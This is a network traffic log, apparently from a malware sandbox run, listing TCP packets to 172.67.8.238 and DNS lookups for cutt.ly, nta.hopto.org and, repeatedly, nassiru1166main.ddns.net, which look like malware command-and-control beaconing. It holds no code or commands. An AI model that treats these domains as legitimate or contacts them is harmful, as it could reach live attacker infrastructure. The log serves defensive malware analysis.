May 3, 2021 14:30:44.102896929 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.144063950 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271003962 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271042109 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271071911 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271099091 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271126032 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.271217108 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.271258116 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.273977995 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.273998976 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.274085045 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.274147987 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.274168968 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.274211884 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.274246931 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.275136948 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.275158882 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.275194883 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.275217056 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.276101112 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.276123047 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.276175022 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.279719114 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.279784918 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.279836893 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.279839039 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.279875040 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.279901028 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.279910088 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.279956102 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.279959917 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.280014992 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.280018091 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.280071020 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.280947924 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.281017065 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.281033993 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.281075001 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.281966925 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.281999111 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.282036066 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.282053947 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.282917023 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.282959938 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.282980919 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.282999039 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.283811092 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.283839941 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.283895016 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.283910990 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.284756899 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.284789085 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.284818888 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.284832001 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.285254002 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.285274982 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.285315037 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.285738945 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.285815954 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.286422014 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.286463976 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.300616026 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.300633907 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.300746918 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.301326036 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.313124895 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.313154936 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.313251019 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.313271999 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.313579082 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.313636065 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.313688040 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.313731909 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.314618111 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.314662933 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.314675093 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.314701080 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.315653086 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.315687895 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.315707922 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.315732002 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:44.316667080 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.316704988 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:44.316730022 CEST	49165	443	192.168.2.22	172.67.8.238

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:30:43.577013016 CEST	52197	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:43.638731956 CEST	53	52197	8.8.8.8	192.168.2.22
May 3, 2021 14:30:44.746788025 CEST	53099	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:44.806654930 CEST	53	53099	8.8.8.8	192.168.2.22
May 3, 2021 14:30:44.817750931 CEST	52838	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:44.881036997 CEST	53	52838	8.8.8.8	192.168.2.22
May 3, 2021 14:30:48.235035896 CEST	61200	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:48.292068005 CEST	53	61200	8.8.8.8	192.168.2.22
May 3, 2021 14:30:48.293847084 CEST	49548	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:48.353539944 CEST	53	49548	8.8.8.8	192.168.2.22
May 3, 2021 14:30:48.632582903 CEST	55627	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:48.691752911 CEST	53	55627	8.8.8.8	192.168.2.22
May 3, 2021 14:30:48.695115089 CEST	56009	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:48.745992899 CEST	53	56009	8.8.8.8	192.168.2.22
May 3, 2021 14:30:49.419883013 CEST	61865	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:49.478705883 CEST	53	61865	8.8.8.8	192.168.2.22
May 3, 2021 14:30:49.482696056 CEST	55171	53	192.168.2.22	8.8.8.8
May 3, 2021 14:30:49.544231892 CEST	53	55171	8.8.8.8	192.168.2.22
May 3, 2021 14:31:00.227276087 CEST	52496	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:00.288012981 CEST	53	52496	8.8.8.8	192.168.2.22
May 3, 2021 14:31:01.968149900 CEST	57564	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:02.031037092 CEST	53	57564	8.8.8.8	192.168.2.22
May 3, 2021 14:31:02.031425953 CEST	57564	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:02.093127966 CEST	53	57564	8.8.8.8	192.168.2.22
May 3, 2021 14:31:26.039608002 CEST	63009	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:26.094225883 CEST	53	63009	8.8.8.8	192.168.2.22
May 3, 2021 14:31:26.094854116 CEST	63009	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:26.146703959 CEST	53	63009	8.8.8.8	192.168.2.22
May 3, 2021 14:31:26.235183001 CEST	59319	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:26.292517900 CEST	53	59319	8.8.4.4	192.168.2.22
May 3, 2021 14:31:26.293064117 CEST	59319	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:26.350156069 CEST	53	59319	8.8.4.4	192.168.2.22
May 3, 2021 14:31:26.427114964 CEST	53070	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:26.485254049 CEST	53	53070	8.8.8.8	192.168.2.22
May 3, 2021 14:31:30.551136971 CEST	59770	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:30.611386061 CEST	53	59770	8.8.8.8	192.168.2.22
May 3, 2021 14:31:30.611747980 CEST	59770	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:30.671408892 CEST	53	59770	8.8.8.8	192.168.2.22
May 3, 2021 14:31:30.795358896 CEST	61523	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:30.852699995 CEST	53	61523	8.8.4.4	192.168.2.22
May 3, 2021 14:31:30.853207111 CEST	61523	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:30.910312891 CEST	53	61523	8.8.4.4	192.168.2.22
May 3, 2021 14:31:31.022815943 CEST	62791	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:31.081715107 CEST	53	62791	8.8.8.8	192.168.2.22
May 3, 2021 14:31:31.082247019 CEST	62791	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:31.142422915 CEST	53	62791	8.8.8.8	192.168.2.22
May 3, 2021 14:31:35.185709953 CEST	50667	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:35.245433092 CEST	53	50667	8.8.8.8	192.168.2.22
May 3, 2021 14:31:35.245955944 CEST	50667	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:35.305705070 CEST	53	50667	8.8.8.8	192.168.2.22
May 3, 2021 14:31:35.306466103 CEST	50667	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:35.359662056 CEST	53	50667	8.8.8.8	192.168.2.22
May 3, 2021 14:31:35.442753077 CEST	54129	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:35.502801895 CEST	53	54129	8.8.4.4	192.168.2.22
May 3, 2021 14:31:35.511185884 CEST	65329	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:35.571302891 CEST	53	65329	8.8.8.8	192.168.2.22
May 3, 2021 14:31:35.571930885 CEST	65329	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:35.631576061 CEST	53	65329	8.8.8.8	192.168.2.22
May 3, 2021 14:31:55.445091963 CEST	60718	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:55.502285004 CEST	53	60718	8.8.8.8	192.168.2.22
May 3, 2021 14:31:55.526201963 CEST	49157	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:55.583230972 CEST	53	49157	8.8.4.4	192.168.2.22
May 3, 2021 14:31:55.584156036 CEST	49157	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:55.634183884 CEST	53	49157	8.8.4.4	192.168.2.22
May 3, 2021 14:31:55.698333025 CEST	57391	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:55.747109890 CEST	53	57391	8.8.8.8	192.168.2.22
May 3, 2021 14:31:59.794105053 CEST	61858	53	192.168.2.22	8.8.8.8
May 3, 2021 14:31:59.856592894 CEST	53	61858	8.8.8.8	192.168.2.22
May 3, 2021 14:31:59.880872965 CEST	62500	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:59.938287020 CEST	53	62500	8.8.4.4	192.168.2.22
May 3, 2021 14:31:59.938693047 CEST	62500	53	192.168.2.22	8.8.4.4
May 3, 2021 14:31:59.987391949 CEST	53	62500	8.8.4.4	192.168.2.22
May 3, 2021 14:32:00.042397022 CEST	51652	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:00.101639986 CEST	53	51652	8.8.8.8	192.168.2.22
May 3, 2021 14:32:04.209388971 CEST	62762	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:04.259260893 CEST	53	62762	8.8.8.8	192.168.2.22
May 3, 2021 14:32:04.412116051 CEST	56905	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:04.460850954 CEST	53	56905	8.8.4.4	192.168.2.22
May 3, 2021 14:32:04.512809038 CEST	54609	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:04.570106030 CEST	53	54609	8.8.8.8	192.168.2.22
May 3, 2021 14:32:24.507616043 CEST	58101	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:24.569761992 CEST	53	58101	8.8.8.8	192.168.2.22
May 3, 2021 14:32:24.570338964 CEST	58101	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:24.619604111 CEST	53	58101	8.8.8.8	192.168.2.22
May 3, 2021 14:32:24.661243916 CEST	64329	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:24.709963083 CEST	53	64329	8.8.4.4	192.168.2.22
May 3, 2021 14:32:24.710371971 CEST	64329	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:24.758923054 CEST	53	64329	8.8.4.4	192.168.2.22
May 3, 2021 14:32:24.803915977 CEST	64881	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:24.861840010 CEST	53	64881	8.8.8.8	192.168.2.22
May 3, 2021 14:32:28.900281906 CEST	55327	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:28.957312107 CEST	53	55327	8.8.8.8	192.168.2.22
May 3, 2021 14:32:28.958039999 CEST	55327	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:29.017015934 CEST	53	55327	8.8.8.8	192.168.2.22
May 3, 2021 14:32:29.076776981 CEST	59150	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:29.125664949 CEST	53	59150	8.8.4.4	192.168.2.22
May 3, 2021 14:32:29.133922100 CEST	63439	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:29.183082104 CEST	53	63439	8.8.8.8	192.168.2.22
May 3, 2021 14:32:29.190252066 CEST	63439	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:29.240221977 CEST	53	63439	8.8.8.8	192.168.2.22
May 3, 2021 14:32:33.273406029 CEST	65040	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:33.322829962 CEST	53	65040	8.8.8.8	192.168.2.22
May 3, 2021 14:32:33.383958101 CEST	61369	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:33.437680960 CEST	53	61369	8.8.4.4	192.168.2.22
May 3, 2021 14:32:33.444251060 CEST	65515	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:33.496556997 CEST	53	65515	8.8.8.8	192.168.2.22
May 3, 2021 14:32:33.503207922 CEST	65515	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:33.554649115 CEST	53	65515	8.8.8.8	192.168.2.22
May 3, 2021 14:32:33.555152893 CEST	65515	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:33.607965946 CEST	53	65515	8.8.8.8	192.168.2.22
May 3, 2021 14:32:53.451242924 CEST	60236	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:53.500072002 CEST	53	60236	8.8.8.8	192.168.2.22
May 3, 2021 14:32:53.588866949 CEST	53198	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:53.648964882 CEST	53	53198	8.8.4.4	192.168.2.22
May 3, 2021 14:32:53.659540892 CEST	50027	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:53.710784912 CEST	53	50027	8.8.8.8	192.168.2.22
May 3, 2021 14:32:53.711302042 CEST	50027	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:53.760754108 CEST	53	50027	8.8.8.8	192.168.2.22
May 3, 2021 14:32:57.809739113 CEST	59245	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:57.858542919 CEST	53	59245	8.8.8.8	192.168.2.22
May 3, 2021 14:32:57.859237909 CEST	59245	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:57.912311077 CEST	53	59245	8.8.8.8	192.168.2.22
May 3, 2021 14:32:57.946073055 CEST	55840	53	192.168.2.22	8.8.4.4
May 3, 2021 14:32:57.996078968 CEST	53	55840	8.8.4.4	192.168.2.22
May 3, 2021 14:32:58.011609077 CEST	61667	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:58.061749935 CEST	53	61667	8.8.8.8	192.168.2.22
May 3, 2021 14:32:58.062278032 CEST	61667	53	192.168.2.22	8.8.8.8
May 3, 2021 14:32:58.110945940 CEST	53	61667	8.8.8.8	192.168.2.22
May 3, 2021 14:33:02.152826071 CEST	63736	53	192.168.2.22	8.8.8.8
May 3, 2021 14:33:02.207108974 CEST	53	63736	8.8.8.8	192.168.2.22
May 3, 2021 14:33:02.251590014 CEST	59805	53	192.168.2.22	8.8.4.4
May 3, 2021 14:33:02.300600052 CEST	53	59805	8.8.4.4	192.168.2.22
May 3, 2021 14:33:02.314443111 CEST	62322	53	192.168.2.22	8.8.8.8
May 3, 2021 14:33:02.363727093 CEST	53	62322	8.8.8.8	192.168.2.22
May 3, 2021 14:33:02.364259005 CEST	62322	53	192.168.2.22	8.8.8.8
May 3, 2021 14:33:02.414501905 CEST	53	62322	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 14:30:43.577013016 CEST	192.168.2.22	8.8.8.8	0x8c10	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.746788025 CEST	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.817750931 CEST	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.235035896 CEST	192.168.2.22	8.8.8.8	0x3d77	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.293847084 CEST	192.168.2.22	8.8.8.8	0x4466	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.632582903 CEST	192.168.2.22	8.8.8.8	0x8fbf	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.695115089 CEST	192.168.2.22	8.8.8.8	0xb195	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.419883013 CEST	192.168.2.22	8.8.8.8	0x9b62	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.482696056 CEST	192.168.2.22	8.8.8.8	0x5da7	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
May 3, 2021 14:31:00.227276087 CEST	192.168.2.22	8.8.8.8	0x7a5f	Standard query (0)	nta.hopto.org	A (IP address)	IN (0x0001)
May 3, 2021 14:31:01.968149900 CEST	192.168.2.22	8.8.8.8	0x1175	Standard query (0)	nta.hopto.org	A (IP address)	IN (0x0001)
May 3, 2021 14:31:02.031425953 CEST	192.168.2.22	8.8.8.8	0x1175	Standard query (0)	nta.hopto.org	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.039608002 CEST	192.168.2.22	8.8.8.8	0xc5e4	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.094854116 CEST	192.168.2.22	8.8.8.8	0xc5e4	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.235183001 CEST	192.168.2.22	8.8.4.4	0x128	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.293064117 CEST	192.168.2.22	8.8.4.4	0x128	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.427114964 CEST	192.168.2.22	8.8.8.8	0x7316	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.551136971 CEST	192.168.2.22	8.8.8.8	0xfefc	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.611747980 CEST	192.168.2.22	8.8.8.8	0xfefc	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.795358896 CEST	192.168.2.22	8.8.4.4	0x170d	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.853207111 CEST	192.168.2.22	8.8.4.4	0x170d	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:31.022815943 CEST	192.168.2.22	8.8.8.8	0x8b6a	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:31.082247019 CEST	192.168.2.22	8.8.8.8	0x8b6a	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.185709953 CEST	192.168.2.22	8.8.8.8	0xaa9	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.245955944 CEST	192.168.2.22	8.8.8.8	0xaa9	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.306466103 CEST	192.168.2.22	8.8.8.8	0xaa9	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.442753077 CEST	192.168.2.22	8.8.4.4	0xf916	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.511185884 CEST	192.168.2.22	8.8.8.8	0x73e	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.571930885 CEST	192.168.2.22	8.8.8.8	0x73e	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.445091963 CEST	192.168.2.22	8.8.8.8	0x1088	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.526201963 CEST	192.168.2.22	8.8.4.4	0xc350	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.584156036 CEST	192.168.2.22	8.8.4.4	0xc350	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.698333025 CEST	192.168.2.22	8.8.8.8	0xf228	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.794105053 CEST	192.168.2.22	8.8.8.8	0x37c6	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.880872965 CEST	192.168.2.22	8.8.4.4	0x7455	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.938693047 CEST	192.168.2.22	8.8.4.4	0x7455	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:00.042397022 CEST	192.168.2.22	8.8.8.8	0xd113	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.209388971 CEST	192.168.2.22	8.8.8.8	0x73e1	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.412116051 CEST	192.168.2.22	8.8.4.4	0x6e31	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.512809038 CEST	192.168.2.22	8.8.8.8	0x4326	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.507616043 CEST	192.168.2.22	8.8.8.8	0x1dc8	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.570338964 CEST	192.168.2.22	8.8.8.8	0x1dc8	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.661243916 CEST	192.168.2.22	8.8.4.4	0xc782	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.710371971 CEST	192.168.2.22	8.8.4.4	0xc782	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.803915977 CEST	192.168.2.22	8.8.8.8	0x38f6	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:28.900281906 CEST	192.168.2.22	8.8.8.8	0x9fed	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:28.958039999 CEST	192.168.2.22	8.8.8.8	0x9fed	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.076776981 CEST	192.168.2.22	8.8.4.4	0x9ac3	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.133922100 CEST	192.168.2.22	8.8.8.8	0xea48	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.190252066 CEST	192.168.2.22	8.8.8.8	0xea48	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.273406029 CEST	192.168.2.22	8.8.8.8	0x6d95	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.383958101 CEST	192.168.2.22	8.8.4.4	0x6d27	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.444251060 CEST	192.168.2.22	8.8.8.8	0x5492	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.503207922 CEST	192.168.2.22	8.8.8.8	0x5492	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.555152893 CEST	192.168.2.22	8.8.8.8	0x5492	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.451242924 CEST	192.168.2.22	8.8.8.8	0x3676	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.588866949 CEST	192.168.2.22	8.8.4.4	0x6916	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.659540892 CEST	192.168.2.22	8.8.8.8	0x42ca	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.711302042 CEST	192.168.2.22	8.8.8.8	0x42ca	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.809739113 CEST	192.168.2.22	8.8.8.8	0xe654	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.859237909 CEST	192.168.2.22	8.8.8.8	0xe654	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.946073055 CEST	192.168.2.22	8.8.4.4	0x6ce3	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:58.011609077 CEST	192.168.2.22	8.8.8.8	0xad7d	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:32:58.062278032 CEST	192.168.2.22	8.8.8.8	0xad7d	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.152826071 CEST	192.168.2.22	8.8.8.8	0xbb22	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.251590014 CEST	192.168.2.22	8.8.4.4	0xab6e	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.314443111 CEST	192.168.2.22	8.8.8.8	0x3cc7	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)
